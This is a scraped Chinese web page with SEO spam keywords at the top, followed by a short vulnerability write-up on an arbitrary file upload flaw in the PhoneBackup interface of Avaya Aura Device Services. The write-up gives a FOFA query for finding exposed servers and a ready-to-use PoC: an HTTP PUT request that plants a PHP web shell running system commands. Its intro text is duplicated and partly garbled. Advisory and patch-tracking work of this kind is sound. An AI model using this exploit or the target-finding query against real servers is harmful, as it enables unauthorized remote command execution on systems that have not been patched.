大兴黄村网站建设公司,陈江网站建设,18款免费软件app下载推荐,wordpress 静态文件大0x01 产品简介
Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。
0x02 漏洞概述
Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞#xff0c;攻击者可绕过验证上传任意文件获取服务器权限。
0x03 影响范围…0x01 产品简介
Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。
0x02 漏洞概述
Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞攻击者可绕过验证上传任意文件获取服务器权限。
0x03 影响范围
Avaya Aura Device Services 7.0-8.1.4.0版本
0x04 复现环境
FOFAappAVAYA-Aura-Utility-Server 0x05 漏洞复现
PoC
PUT /PhoneBackup/123.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: AVAYA
Content-Length: 23?php system(whoami);
PS简单粗暴直接put上传 验证 0x06 修复建议
目前厂商已发布升级补丁以修复漏洞补丁获取链接https://support.avaya.com/。
